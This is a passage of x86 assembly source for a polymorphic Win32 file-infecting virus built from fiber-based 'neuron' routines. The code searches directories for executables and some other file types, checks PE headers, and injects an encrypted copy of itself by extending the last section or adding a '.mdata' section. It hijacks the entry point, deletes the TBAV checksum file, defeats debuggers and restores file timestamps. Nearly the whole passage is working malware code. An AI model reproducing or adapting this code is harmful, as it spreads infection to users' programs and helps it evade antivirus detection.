loop process_dir ;next extension
|
|||
|
|
|||
|
lea esi, [ebx + dtavTBAV]
|
|||
|
push 0
|
|||
|
push esi
|
|||
|
call [ebx + ddSetFileAttributesA] ;blank file attributes
|
|||
|
push esi
|
|||
|
call [ebx + ddDeleteFileA] ;delete TBAV checksum file
|
|||
|
|
|||
|
lea edx, [ebx + dotdot]
|
|||
|
push edx
|
|||
|
call [ebx + ddSetCurrentDirectoryA] ;switch to subdirectory
|
|||
|
pop ecx
|
|||
|
loop path_walk
|
|||
|
|
|||
|
lea edx, [ebx + CurDir]
|
|||
|
push edx
|
|||
|
call [ebx + ddSetCurrentDirectoryA] ;switch back
|
|||
|
|
|||
|
push [ebx + pfMain]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch back to main fiber
|
|||
|
popad
|
|||
|
ret
|
|||
|
Neuron_Main EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_Debugger Proc PASCAL delta_param:DWORD ;delta offset as dendrit
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
call [ebx + ddIsDebuggerPresent] ;is debugger present ?
|
|||
|
xchg eax, ecx
|
|||
|
jecxz end_debugger ;nope, jump to end
|
|||
|
|
|||
|
in al, 40h ;this will cause execution
|
|||
|
xor esp, esp ;"xor esp, esp" under TD32
|
|||
|
|
|||
|
end_debugger:
|
|||
|
push [ebx + pfNeuron_Main]
|
|||
|
call [ebx + ddSwitchToFiber] ;jump back to main neuron
|
|||
|
|
|||
|
popad
|
|||
|
ret
|
|||
|
Neuron_Debugger EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_FindFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit
|
|||
|
|
|||
|
n_findfile:
|
|||
|
pushad ;save all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
mov edx, 0 ;pointer to file name
|
|||
|
nfindfile_name = dword ptr $ - 4 ;as dendrit
|
|||
|
|
|||
|
lea eax, [ebx + WFD] ;find first file
|
|||
|
push eax
|
|||
|
push edx
|
|||
|
call [ebx + ddFindFirstFileA]
|
|||
|
xchg eax, ecx
|
|||
|
jecxz end_FindFile
|
|||
|
mov [ebx + SearchHandle], ecx ;save search handle
|
|||
|
|
|||
|
checkfile:
|
|||
|
mov [ebx + nCF_synapse], offset pfNeuron_FindFile ;build synapse
|
|||
|
push [ebx + pfNeuron_CheckFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;and switch to neuron
|
|||
|
|
|||
|
xor eax, eax
|
|||
|
cmp al, 0
|
|||
|
nCheckFile_OK = byte ptr $ - 1 ;check Axon
|
|||
|
je find_next_file ;check failed ?
|
|||
|
|
|||
|
mov [ebx + nIF_synapse], offset pfNeuron_FindFile ;build synapse
|
|||
|
push [ebx + pfNeuron_InfectFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;and switch to neuron
|
|||
|
|
|||
|
find_next_file:
|
|||
|
lea edx, [ebx + WFD]
|
|||
|
push edx
|
|||
|
push [ebx + SearchHandle]
|
|||
|
call [ebx + ddFindNextFileA] ;find next file
|
|||
|
test eax, eax
|
|||
|
jne checkfile ;r there more files ?
|
|||
|
push [ebx + SearchHandle]
|
|||
|
call [ebx + ddFindClose] ;nope, close search handle
|
|||
|
|
|||
|
end_FindFile:
|
|||
|
push [ebx + dwThreadID]
|
|||
|
nFF_synapse = dword ptr $ - 4 ;jump to previous neuron
|
|||
|
call [ebx + ddSwitchToFiber] ;(depends on synapse)
|
|||
|
|
|||
|
popad
|
|||
|
jmp n_findfile
|
|||
|
Neuron_FindFile EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_CheckFile Proc PASCAL delta_param:DWORD ;d-offset as dendrit
|
|||
|
|
|||
|
n_checkfile:
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
mov [ebx + nCheckFile_OK], 0
|
|||
|
test [ebx + WFD.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY
|
|||
|
jne end_checkfile ;discard directories
|
|||
|
xor edx, edx
|
|||
|
mov ecx, [ebx + WFD.WFD_nFileSizeHigh]
|
|||
|
cmp ecx, edx
|
|||
|
jne end_checkfile ;discard huge files
|
|||
|
add dx, 4096
|
|||
|
cmp [ebx + WFD.WFD_nFileSizeLow], edx
|
|||
|
jb end_checkfile ;discard small files
|
|||
|
|
|||
|
mov [ebx + nopenfile_size], ecx ;dendrit
|
|||
|
mov [ebx + nOF_synapse], offset pfNeuron_CheckFile ;build synapse
|
|||
|
push [ebx + pfNeuron_OpenFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to neuron
|
|||
|
mov ecx, [ebx + lpFile]
|
|||
|
jecxz end_checkfile ;mapped failed ?
|
|||
|
mov dl, byte ptr [ecx.MZ_res2]
|
|||
|
test dl, dl
|
|||
|
jne end_check_close ;test "already infected" mark
|
|||
|
|
|||
|
mov edx, ecx
|
|||
|
cmp word ptr [ecx], IMAGE_DOS_SIGNATURE ;must be MZ
|
|||
|
jne end_check_close
|
|||
|
mov ecx, [ecx.MZ_lfanew]
|
|||
|
jecxz end_check_close
|
|||
|
mov eax, [ebx + WFD.WFD_nFileSizeLow]
|
|||
|
cmp eax, ecx
|
|||
|
jb end_check_close ;must point inside file
|
|||
|
add ecx, edx
|
|||
|
|
|||
|
cmp dword ptr [ecx], IMAGE_NT_SIGNATURE ;must be PE\0\0
|
|||
|
jne end_check_close
|
|||
|
cmp word ptr [ecx.NT_FileHeader.FH_Machine], IMAGE_FILE_MACHINE_I386
|
|||
|
jne end_check_close ;must be 386+
|
|||
|
test byte ptr [ecx.NT_FileHeader.FH_Characteristics], IMAGE_FILE_EXECUTABLE_IMAGE
|
|||
|
je end_check_close
|
|||
|
cmp [ecx.NT_OptionalHeader.OH_ImageBase], 400000h ;must be 0x400000
|
|||
|
jne end_check_close
|
|||
|
xor eax, eax
|
|||
|
inc eax
|
|||
|
mov [ebx + nCheckFile_OK], al ;axon
|
|||
|
|
|||
|
end_check_close:
|
|||
|
cdq
|
|||
|
inc edx
|
|||
|
inc edx
|
|||
|
mov [ebx + nclosefile_mode], dl ;dendrit
|
|||
|
mov [ebx + nClF_synapse], offset pfNeuron_CheckFile
|
|||
|
push [ebx + pfNeuron_CloseFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to neuron
|
|||
|
|
|||
|
end_checkfile:
|
|||
|
push [ebx + dwThreadID]
|
|||
|
nCF_synapse = dword ptr $ - 4
|
|||
|
call [ebx + ddSwitchToFiber] ;jump to previous neuron
|
|||
|
|
|||
|
popad
|
|||
|
jmp n_checkfile
|
|||
|
Neuron_CheckFile EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_OpenFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit
|
|||
|
|
|||
|
n_openfile:
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
lea esi, [ebx + WFD.WFD_szFileName]
|
|||
|
mov edi, 0
|
|||
|
nopenfile_size = dword ptr $ - 4 ;dendrit
|
|||
|
xor eax, eax
|
|||
|
mov [ebx + lpFile], eax
|
|||
|
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push OPEN_EXISTING
|
|||
|
push eax
|
|||
|
mov al, 1
|
|||
|
push eax
|
|||
|
ror eax, 1
|
|||
|
mov ecx, edi
|
|||
|
jecxz $ + 4
|
|||
|
rcr eax, 1
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call [ebx + ddCreateFileA] ;open file
|
|||
|
inc eax
|
|||
|
je end_OpenFile
|
|||
|
dec eax
|
|||
|
mov [ebx + hFile], eax
|
|||
|
cdq
|
|||
|
|
|||
|
push edx
|
|||
|
push edi
|
|||
|
push edx
|
|||
|
mov dl, PAGE_READONLY
|
|||
|
test edi, edi
|
|||
|
je $ + 4
|
|||
|
shl dl, 1
|
|||
|
push edx
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
call [ebx + ddCreateFileMappingA] ;create mappin object
|
|||
|
test eax, eax
|
|||
|
je end_OpenFile2
|
|||
|
mov [ebx + hMapFile], eax
|
|||
|
cdq
|
|||
|
|
|||
|
push edi
|
|||
|
push edx
|
|||
|
push edx
|
|||
|
mov dl, FILE_MAP_READ
|
|||
|
test edi, edi
|
|||
|
je $ + 4
|
|||
|
shr dl, 1
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
call [ebx + ddMapViewOfFile] ;map view of file
|
|||
|
mov [ebx + lpFile], eax
|
|||
|
test eax, eax
|
|||
|
jne end_OpenFile
|
|||
|
|
|||
|
end_OpenFile3:
|
|||
|
inc eax
|
|||
|
end_OpenFile2:
|
|||
|
mov [ebx + nclosefile_mode], al ;axon
|
|||
|
mov eax, [nOF_synapse]
|
|||
|
mov [ebx + nClF_synapse], eax ;dendrit
|
|||
|
push [ebx + pfNeuron_CloseFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to neuron
|
|||
|
|
|||
|
end_OpenFile:
|
|||
|
push [ebx + dwThreadID]
|
|||
|
nOF_synapse = dword ptr $ - 4
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to previous neuron
|
|||
|
popad
|
|||
|
jmp n_openfile
|
|||
|
Neuron_OpenFile EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_CloseFile Proc PASCAL delta_param:DWORD
|
|||
|
;delta offset as dendrit
|
|||
|
n_closefile:
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
|
|||
|
mov esi, [ebx + hFile]
|
|||
|
xor edi, edi
|
|||
|
xor ecx, ecx
|
|||
|
mov cl, 0
|
|||
|
nclosefile_mode = byte ptr $ - 1 ;dendrit
|
|||
|
jecxz closefile
|
|||
|
cmp cl, 1
|
|||
|
je closemap
|
|||
|
cmp cl, 2
|
|||
|
je unmapfile
|
|||
|
cmp al, 3
|
|||
|
je next_edi
|
|||
|
inc edi
|
|||
|
next_edi:
|
|||
|
inc edi
|
|||
|
unmapfile:
|
|||
|
push [ebx + lpFile]
|
|||
|
call [ebx + ddUnmapViewOfFile] ;unmap view of file
|
|||
|
closemap:
|
|||
|
push [ebx + hMapFile]
|
|||
|
call [ebx + ddCloseHandle] ;close mappin object
|
|||
|
|
|||
|
test edi, edi
|
|||
|
je closefile
|
|||
|
cmp edi, 1
|
|||
|
je set_time
|
|||
|
|
|||
|
xor eax, eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push [ebx + WFD.WFD_nFileSizeLow]
|
|||
|
push esi
|
|||
|
call [ebx + ddSetFilePointer] ;set file pointer API
|
|||
|
push esi
|
|||
|
call [ebx + ddSetEndOfFile] ;set EOF
|
|||
|
|
|||
|
set_time:
|
|||
|
lea eax, [ebx + WFD.WFD_ftLastWriteTime]
|
|||
|
push eax
|
|||
|
lea eax, [ebx + WFD.WFD_ftLastAccessTime]
|
|||
|
push eax
|
|||
|
lea eax, [ebx + WFD.WFD_ftCreationTime]
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call [ebx + ddSetFileTime] ;set back file time
|
|||
|
|
|||
|
closefile:
|
|||
|
push [ebx + hFile]
|
|||
|
call [ebx + ddCloseHandle] ;close file
|
|||
|
|
|||
|
push [ebx + dwThreadID]
|
|||
|
nClF_synapse = dword ptr $ - 4
|
|||
|
call [ebx + ddSwitchToFiber] ;jump to previous neuron
|
|||
|
|
|||
|
popad
|
|||
|
jmp n_closefile
|
|||
|
Neuron_CloseFile EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_InfectFile Proc PASCAL delta_param:DWORD
|
|||
|
;delta offset as dendrit
|
|||
|
n_infectfile:
|
|||
|
pushad ;store all regs
|
|||
|
mov ebx, delta_param ;store delta offset
|
|||
|
@SEH_SetupFrame ;setup SEH frame
|
|||
|
|
|||
|
xor esi, esi
|
|||
|
push esi
|
|||
|
lea edi, [ebx + WFD.WFD_szFileName]
|
|||
|
push edi
|
|||
|
call [ebx + ddSetFileAttributesA] ;blank file attributes
|
|||
|
test eax, eax
|
|||
|
je end_InfectFile
|
|||
|
|
|||
|
mov eax, [ebx + WFD.WFD_nFileSizeLow]
|
|||
|
sub eax, Start - virus_end
|
|||
|
mov [ebx + nopenfile_size], eax ;dendrit
|
|||
|
mov [ebx + nOF_synapse], offset pfNeuron_InfectFile ;synapse
|
|||
|
push [ebx + pfNeuron_OpenFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to neuron
|
|||
|
mov ecx, [ebx + lpFile]
|
|||
|
test ecx, ecx
|
|||
|
je err_InfectFile
|
|||
|
|
|||
|
lea eax, [ebx + szGetModuleHandleA]
|
|||
|
lea edx, [ebx + szKernel32]
|
|||
|
call GetProcAddressIT ;imports GetModuleHandleA ?
|
|||
|
test eax, eax
|
|||
|
jne store
|
|||
|
|
|||
|
lea eax, [ebx + szGetModuleHandleW] ;nope, must import Unicode
|
|||
|
call GetProcAddressIT ;version of that
|
|||
|
test eax, eax
|
|||
|
je err_InfectFile
|
|||
|
mov [ebx + GMHW], eax
|
|||
|
xor eax, eax
|
|||
|
store: mov [ebx + GMHA], eax
|
|||
|
|
|||
|
push ecx
|
|||
|
add ecx, [ecx.MZ_lfanew]
|
|||
|
mov edx, ecx
|
|||
|
x = IMAGE_SIZEOF_SECTION_HEADER
|
|||
|
movzx esi, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader]
|
|||
|
lea esi, [edx.NT_OptionalHeader + esi]
|
|||
|
movzx eax, word ptr [edx.NT_FileHeader.FH_NumberOfSections]
|
|||
|
test eax, eax
|
|||
|
je err_InfectFile
|
|||
|
imul eax, x
|
|||
|
add esi, eax
|
|||
|
|
|||
|
in al, 40h ;select how to infect file
|
|||
|
and al, 2
|
|||
|
je NextWayOfInfection
|
|||
|
|
|||
|
push [esi.SH_SizeOfRawData - x]
|
|||
|
lea edi, [esi.SH_VirtualSize - x]
|
|||
|
sub dword ptr [edi], Start - virtual_end ;new virtual size
|
|||
|
mov eax, [edi]
|
|||
|
|
|||
|
push edx
|
|||
|
mov ecx, [edx.NT_OptionalHeader.OH_FileAlignment]
|
|||
|
cdq
|
|||
|
div ecx
|
|||
|
inc eax
|
|||
|
mul ecx
|
|||
|
mov [esi.SH_SizeOfRawData - x], eax ;new SizeOfRawData
|
|||
|
mov ecx, eax
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax, [ebx + Entrypoint]
|
|||
|
push [edx.NT_OptionalHeader.OH_AddressOfEntryPoint]
|
|||
|
pop [ebx + Entrypoint]
|
|||
|
|
|||
|
pop edi
|
|||
|
push eax
|
|||
|
sub ecx, edi
|
|||
|
add [edx.NT_OptionalHeader.OH_SizeOfImage], ecx ;new SizeOfImage
|
|||
|
|
|||
|
or [esi.SH_Characteristics.hiw.hib - x], 0e0h ;change flags
|
|||
|
mov eax, [esi.SH_PointerToRawData - x]
|
|||
|
add eax, edi
|
|||
|
mov ecx, [ebx + WFD.WFD_nFileSizeLow]
|
|||
|
add edi, ecx
|
|||
|
sub edi, eax
|
|||
|
mov esi, [esi.SH_VirtualAddress - x]
|
|||
|
add esi, edi
|
|||
|
mov [edx.NT_OptionalHeader.OH_AddressOfEntryPoint], esi ;new EP
|
|||
|
pop eax
|
|||
|
|
|||
|
copy_virus:
|
|||
|
pop edi
|
|||
|
mov byte ptr [edi.MZ_res2], 1 ;set "already infected" mark
|
|||
|
add edi, ecx
|
|||
|
|
|||
|
pushad ;POLY ENGINE STARTS HERE...
|
|||
|
rep_1: call get_reg ;load random register
|
|||
|
mov dl, al
|
|||
|
add al, 58h ;create POP reg
|
|||
|
mov byte ptr [ebx + @1], al ;store it
|
|||
|
lea edi, [ebx + @2+1] ;and aply registry changes
|
|||
|
call mask_it ;to all needed
|
|||
|
lea edi, [ebx + @3] ;instructions
|
|||
|
call mask_it ;...
|
|||
|
rep_2: call get_reg ;get random register
|
|||
|
cmp al, dl ;mustnt be previous register
|
|||
|
je rep_2
|
|||
|
mov dh, al
|
|||
|
xchg dl, dh
|
|||
|
add al, 0b8h ;create MOV instruction
|
|||
|
mov byte ptr [ebx + @4], al ;store it
|
|||
|
lea edi, [ebx + @5] ;and aply changes
|
|||
|
call mask_it
|
|||
|
push eax
|
|||
|
in al, 40h
|
|||
|
and al, 1
|
|||
|
je _test_
|
|||
|
mov al, 0bh ;OR reg, reg
|
|||
|
jmp _write
|
|||
|
_test_: mov al, 85h ;TEST reg, reg
|
|||
|
_write: mov byte ptr [ebx + @6-1], al ;store it
|
|||
|
pop eax
|
|||
|
lea edi, [ebx + @6]
|
|||
|
mov al, [edi]
|
|||
|
and al, 11000000b
|
|||
|
add al, dl
|
|||
|
ror al, 3
|
|||
|
add al, dl
|
|||
|
rol al, 3
|
|||
|
stosb
|
|||
|
rep_3: call get_reg ;get random register
|
|||
|
cmp al, dl ;mustnt be previous register
|
|||
|
je rep_3
|
|||
|
cmp al, dh
|
|||
|
je rep_3
|
|||
|
cmp al, 101b ;mustnt be EBP
|
|||
|
je rep_3 ;(due to instr. incompatibility)
|
|||
|
|
|||
|
mov dl, al
|
|||
|
lea edi, [ebx + @3]
|
|||
|
mov al, [edi]
|
|||
|
and al, 11000111b
|
|||
|
ror al, 3
|
|||
|
add al, dl
|
|||
|
rol al, 3
|
|||
|
stosb
|
|||
|
lea edi, [ebx + @7]
|
|||
|
call mask_it
|
|||
|
lea edi, [ebx + @8]
|
|||
|
call mask_it
|
|||
|
lea esi, [ebx + junx]
|
|||
|
gen_j: lodsd ;junk instructions generator
|
|||
|
xchg eax, ecx
|
|||
|
jecxz end_mutate
|
|||
|
mov edi, ecx
|
|||
|
add edi, ebx
|
|||
|
xor eax, eax
|
|||
|
in al, 40h
|
|||
|
and al, 1
|
|||
|
je _2&1_
|
|||
|
push esi
|
|||
|
lea esi, [ebx + junx3]
|
|||
|
in al, 40h
|
|||
|
and al, num_junx3-1
|
|||
|
add esi, eax
|
|||
|
movsb
|
|||
|
movsb
|
|||
|
in al, 40h
|
|||
|
stosb
|
|||
|
jmp _gen_j
|
|||
|
_2&1_: push esi
|
|||
|
in al, 40h
|
|||
|
and al, 1
|
|||
|
je twofirst
|
|||
|
call one_byte
|
|||
|
call two_byte
|
|||
|
jmp _gen_j
|
|||
|
twofirst:
|
|||
|
call two_byte
|
|||
|
call one_byte
|
|||
|
_gen_j: pop esi
|
|||
|
jmp gen_j
|
|||
|
end_mutate:
|
|||
|
popad
|
|||
|
push eax
|
|||
|
in al, 40h ;create 32bit key
|
|||
|
mov ah, al
|
|||
|
in al, 40h
|
|||
|
shl eax, 16
|
|||
|
in al, 40h
|
|||
|
mov ah, al
|
|||
|
in al, 40h
|
|||
|
mov dword ptr [ebx + key], eax ;store it
|
|||
|
|
|||
|
push edi
|
|||
|
mov edx, (virus_end-Start+3)/4 ;copy virus body to internal
|
|||
|
lea esi, [ebx + Start] ;buffer
|
|||
|
mov ecx, edx
|
|||
|
lea edi, [ebx + buffer]
|
|||
|
rep movsd
|
|||
|
|
|||
|
xor ecx, ecx
|
|||
|
lea esi, [ebx + buffer - Start + encrypted]
|
|||
|
crypt: xor [esi], eax ;encrypt virus body
|
|||
|
add esi, 4
|
|||
|
inc ecx
|
|||
|
cmp ecx, (virus_end-encrypted+3)/4
|
|||
|
jne crypt
|
|||
|
|
|||
|
pop edi
|
|||
|
pop eax
|
|||
|
lea esi, [ebx + buffer]
|
|||
|
mov ecx, edx
|
|||
|
|
|||
|
inc dword ptr [ebx + GenerationCount] ;increment generation count
|
|||
|
rep movsd ;copy virus
|
|||
|
mov [ebx + Entrypoint], eax ;restore variable after
|
|||
|
mov al, 3 ;copy stage
|
|||
|
jmp if_n
|
|||
|
|
|||
|
err_InfectFile:
|
|||
|
mov al, 4
|
|||
|
mov [ebx + nclosefile_mode], al ;dendrit
|
|||
|
if_n: mov [ebx + nClF_synapse], offset pfNeuron_InfectFile ;synapse
|
|||
|
push [ebx + pfNeuron_CloseFile]
|
|||
|
call [ebx + ddSwitchToFiber] ;switch to neuron
|
|||
|
|
|||
|
end_InfectFile:
|
|||
|
push [ebx + WFD.WFD_dwFileAttributes]
|
|||
|
lea esi, [ebx + WFD.WFD_szFileName]
|
|||
|
push esi
|
|||
|
call [ebx + ddSetFileAttributesA] ;set back file attributes
|
|||
|
|
|||
|
end_IF: push [ebx + dwThreadID]
|
|||
|
nIF_synapse = dword ptr $ - 4
|
|||
|
call [ebx + ddSwitchToFiber] ;jump to previous neuron
|
|||
|
jmp n_infectfile
|
|||
|
|
|||
|
|
|||
|
NextWayOfInfection: ;create new section
|
|||
|
mov edi, edx
|
|||
|
inc word ptr [edi.NT_FileHeader.FH_NumberOfSections]
|
|||
|
mov eax, [esi.SH_VirtualAddress - x]
|
|||
|
add eax, [esi.SH_VirtualSize - x]
|
|||
|
mov ecx, [edi.NT_OptionalHeader.OH_SectionAlignment]
|
|||
|
cdq
|
|||
|
div ecx
|
|||
|
test edx, edx
|
|||
|
je next_1
|
|||
|
inc eax
|
|||
|
next_1: mul ecx
|
|||
|
mov [ebx + s_RVA], eax ;new RVA
|
|||
|
|
|||
|
mov ecx, [ebx + Entrypoint]
|
|||
|
push ecx
|
|||
|
push [edi.NT_OptionalHeader.OH_AddressOfEntryPoint]
|
|||
|
pop [ebx + Entrypoint]
|
|||
|
mov [edi.NT_OptionalHeader.OH_AddressOfEntryPoint], eax ;new EP
|
|||
|
|
|||
|
mov ecx, [edi.NT_OptionalHeader.OH_FileAlignment]
|
|||
|
mov eax, virtual_end - Start
|
|||
|
div ecx
|
|||
|
inc eax
|
|||
|
mul ecx
|
|||
|
mov [ebx + s_RAWSize], eax ;new SizeOfRawData
|
|||
|
add [edi.NT_OptionalHeader.OH_SizeOfImage], eax
|
|||
|
;new SizeOfImageBase
|
|||
|
|
|||
|
mov ecx, [ebx + WFD.WFD_nFileSizeLow]
|
|||
|
mov [ebx + s_RAWPtr], ecx ;new PointerToRawData
|
|||
|
push ecx
|
|||
|
mov edi, esi
|
|||
|
lea esi, [ebx + new_section]
|
|||
|
mov ecx, (IMAGE_SIZEOF_SECTION_HEADER+3)/4
|
|||
|
rep movsd ;copy section
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
jmp copy_virus ;and copy virus body
|
|||
|
|
|||
|
ni_seh: @SEH_RemoveFrame ;remove SEH frame
|
|||
|
popad
|
|||
|
jmp end_IF
|
|||
|
Neuron_InfectFile EndP
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
one_byte:
|
|||
|
lea esi, [ebx + junx1]
|
|||
|
in al, 40h
|
|||
|
and al, num_junx1-1
|
|||
|
add esi, eax
|
|||
|
movsb
|
|||
|
ret
|
|||
|
two_byte:
|
|||
|
lea esi, [ebx + junx2]
|
|||
|
in al, 40h
|
|||
|
and al, num_junx2-1
|
|||
|
add esi, eax
|
|||
|
movsb
|
|||
|
in al, 40h
|
|||
|
and al, 7
|
|||
|
add al, 11000000b
|
|||
|
stosb
|
|||
|
ret
|
|||
|
get_reg:
|
|||
|
in al, 40h
|
|||
|
and al, 7
|
|||
|
je get_reg
|
|||
|
cmp al, 4
|
|||
|
je get_reg
|
|||
|
ret
|
|||
|
mask_it:
|
|||
|
mov al, [edi]
|
|||
|
and al, 11111000b
|
|||
|
add al, dl
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
;-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Neuron_Addresses: dd offset Neuron_Main
|
|||
|
dd offset Neuron_Debugger
|
|||
|
dd offset Neuron_FindFile
|
|||
|
dd offset Neuron_CheckFile
|
|||
|
dd offset Neuron_OpenFile
|
|||
|
dd offset Neuron_CloseFile
|
|||
|
dd offset Neuron_InfectFile
|
|||
|
num_of_neurons = (byte ptr $ - offset Neuron_Addresses) / 4
|
|||
|
|
|||
|
junx1: nop
|
|||
|
dec eax
|
|||
|
cmc
|
|||
|
inc eax
|
|||
|
clc
|
|||
|
cwde
|
|||
|
stc
|
|||
|
lahf
|
|||
|
num_junx1 = 8
|
|||
|
junx2: db 8bh ;mov ..., ...
|
|||
|
db 03h ;add ..., ...
|
|||
|
db 13h ;adc ..., ...
|
|||
|
db 2dh ;sub ..., ...
|
|||
|
db 1bh ;sbb ..., ...
|
|||
|
db 0bh ;or ..., ...
|
|||
|
db 33h ;xor ..., ...
|
|||
|
db 23h ;and ..., ...
|
|||
|
db 33h ;test ..., ...
|
|||
|
num_junx2 = 9
|
|||
|
junx3: db 0c1h, 0c0h ;rol eax, ...
|
|||
|
db 0c1h, 0e0h ;shl eax, ...
|
|||
|
db 0c1h, 0c8h ;ror eax, ...
|
|||
|
db 0c1h, 0e8h ;shr eax, ...
|
|||
|
db 0c1h, 0d0h ;rcl eax, ...
|
|||
|
db 0c1h, 0f8h ;sar eax, ...
|
|||
|
db 0c1h, 0d8h ;rcr eax, ...
|
|||
|
num_junx3 = 7
|
|||
|
junx: irp Num, <1,2,3,4,5,6,7,8,9>
|
|||
|
dd offset @j&Num
|
|||
|
endm
|
|||
|
dd 0
|
|||
|
|
|||
|
GenerationCount dd ?
|
|||
|
Entrypoint dd offset ExitProcess - 400000h
|
|||
|
|
|||
|
szExe db '*.EXE', 0
|
|||
|
szScr db '*.SCR', 0
|
|||
|
szBak db '*.BAK', 0
|
|||
|
szDat db '*.DAT', 0
|
|||
|
szSfx db '*.SFX', 0
|
|||
|
num_of_exts = 5
|
|||
|
dotdot db '..', 0
|
|||
|
|
|||
|
|
|||
|
dtavTBAV db 'anti-vir.dat', 0
|
|||
|
|
|||
|
string_subs: ;string substitutes
|
|||
|
db 'File', 0
|
|||
|
db 'Get', 0
|
|||
|
db 'Set', 0
|
|||
|
db 'Module', 0
|
|||
|
db 'Handle', 0
|
|||
|
db 'Create', 0
|
|||
|
db 'Find', 0
|
|||
|
db 'Close', 0
|
|||
|
db 'ViewOf', 0
|
|||
|
db 'CurrentDirectoryA', 0
|
|||
|
db 'Fiber', 0
|
|||
|
db 'Thread', 0
|
|||
|
db 'Delete', 0
|
|||
|
db 'Library', 0
|
|||
|
new_section:
|
|||
|
s_name db '.mdata', 0, 0
|
|||
|
s_vsize dd virtual_end - Start
|
|||
|
s_RVA dd 0
|
|||
|
s_RAWSize dd 0
|
|||
|
s_RAWPtr dd 0
|
|||
|
dd 0, 0, 0
|
|||
|
s_flags dd 0e0000000h
|
|||
|
|
|||
|
|
|||
|
virus_end:
|
|||
|
|
|||
|
strings:
|
|||
|
szKernel32 db 'KERNEL32', 0
|
|||
|
szKernel32W dw 'K','E','R','N','E','L','3','2', 0
|
|||
|
szUser32 db 'USER32', 0
|
|||
|
|
|||
|
szGetModuleHandleA db 'GetModuleHandleA', 0
|
|||
|
szGetModuleHandleW db 'GetModuleHandleW', 0
|
|||
|
|
|||
|
szAPIs:
|
|||
|
szCreateThread db 'CreateThread', 0
|
|||
|
szWaitForSingleObject db 'WaitForSingleObject', 0
|
|||
|
szCloseHandle db 'CloseHandle', 0
|
|||
|
szConvertThreadToFiber db 'ConvertThreadToFiber', 0
|
|||
|
szCreateFiber db 'CreateFiber', 0
|
|||
|
szSwitchToFiber db 'SwitchToFiber', 0
|
|||
|
szDeleteFiber db 'DeleteFiber', 0
|
|||
|
szGetVersion db 'GetVersion', 0
|
|||
|
szFindFirstFileA db 'FindFirstFileA', 0
|
|||
|
szFindNextFileA db 'FindNextFileA', 0
|
|||
|
szFindClose db 'FindClose', 0
|
|||
|
szCreateFileA db 'CreateFileA', 0
|
|||
|
szCreateFileMappingA db 'CreateFileMappingA', 0
|
|||
|
szMapViewOfFile db 'MapViewOfFile', 0
|
|||
|
szUnmapViewOfFile db 'UnmapViewOfFile', 0
|
|||
|
szSetFileAttributesA db 'SetFileAttributesA', 0
|
|||
|
szSetFilePointer db 'SetFilePointer', 0
|
|||
|
szSetEndOfFile db 'SetEndOfFile', 0
|
|||
|
szSetFileTime db 'SetFileTime', 0
|
|||
|
szGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0
|
|||
|
szSetCurrentDirectoryA db 'SetCurrentDirectoryA', 0
|
|||
|
szDeleteFileA db 'DeleteFileA', 0
|
|||
|
szLoadLibraryA db 'LoadLibraryA', 0
|
|||
|
szFreeLibraryA db 'FreeLibrary', 0
|
|||
|
szIsDebuggerPresent db 'IsDebuggerPresent', 0
|
|||
|
db 0ffh
|
|||
|
|
|||
|
ddAPIs:
|
|||
|
ddCreateThread dd ?
|
|||
|
ddWaitForSingleObject dd ?
|
|||
|
ddCloseHandle dd ?
|
|||
|
ddConvertThreadToFiber dd ?
|
|||
|
ddCreateFiber dd ?
|
|||
|
ddSwitchToFiber dd ?
|
|||
|
ddDeleteFiber dd ?
|
|||
|
ddGetVersion dd ?
|
|||
|
ddFindFirstFileA dd ?
|
|||
|
ddFindNextFileA dd ?
|
|||
|
ddFindClose dd ?
|
|||
|
ddCreateFileA dd ?
|
|||
|
ddCreateFileMappingA dd ?
|
|||
|
ddMapViewOfFile dd ?
|
|||
|
ddUnmapViewOfFile dd ?
|
|||
|
ddSetFileAttributesA dd ?
|
|||
|
ddSetFilePointer dd ?
|
|||
|
ddSetEndOfFile dd ?
|
|||
|
ddSetFileTime dd ?
|
|||
|
ddGetCurrentDirectoryA dd ?
|
|||
|
ddSetCurrentDirectoryA dd ?
|
|||
|
ddDeleteFileA dd ?
|
|||
|
ddLoadLibraryA dd ?
|
|||
|
ddFreeLibraryA dd ?
